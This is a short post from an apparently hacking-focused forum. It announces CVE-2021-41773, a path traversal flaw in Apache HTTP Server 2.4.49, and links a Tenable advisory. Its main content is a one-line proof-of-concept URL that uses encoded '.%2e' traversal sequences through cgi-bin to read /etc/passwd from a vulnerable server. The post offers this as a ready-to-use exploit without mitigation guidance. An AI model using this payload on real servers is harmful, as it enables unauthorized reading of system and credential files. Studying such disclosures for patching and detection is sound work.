Hacking
197

CVE-2021-41773 : Path Traversal Zero-Day in Apache HTTP Server 2.4.49 (only that version) Exploited






  06-Oct-2021 20:41:36



CVE-2021-41773 : Path Traversal Zero-Day in Apache HTTP Server 2.4.49 (only that version) Exploited


POC:) 

hxxps://xxx/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd


https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited


DISCUSSION
Nothing comment here :(
Login for comment and discussion.
Login Here
Popular Posts
Gps Tracker Seccodeid Free Too...
Djie sam soe Djie sam soe
General
5060
156
Top

Complete Basic Course in Kali...
Djie sam soe Djie sam soe
Linux
4434
2
Top

Free Proxy List
Sandidi Sandidi
Networking
2791
3
Top

Mass Reverse IP Unlimited
ImamSy ImamSy
Hacking
2063
10
Top

Report McAfee Antivirus Hurrri...
Indrasp Indrasp
Windows
1560
93
Top

Related Post

Subscribe

Subscribe free now for latest posts